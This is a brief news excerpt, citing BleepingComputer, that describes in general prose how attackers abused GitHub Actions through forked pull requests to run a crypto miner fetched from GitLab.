GitHub Actions is a CI/CD solution that makes it easy to setup periodic tasks for automating your software workflows. The attack involves the threat actor forking a legitimate repository that has GitHub Actions enabled. The threat actor injects malicious code in the forked version, and files a Pull Request for the original repository maintainers to merge the code back. But, in an unexpected twist, the attack does not need the maintainer of the original project to approve the malicious Pull Request. The malicious code loads a misnamed crypto miner from GitLab and runs it with the attacker’s wallet address.
Source: https://www.bleepingcomputer.com/news/security/github-actions-being-actively-abused-to-mine-cryptocurrency-on-github-servers/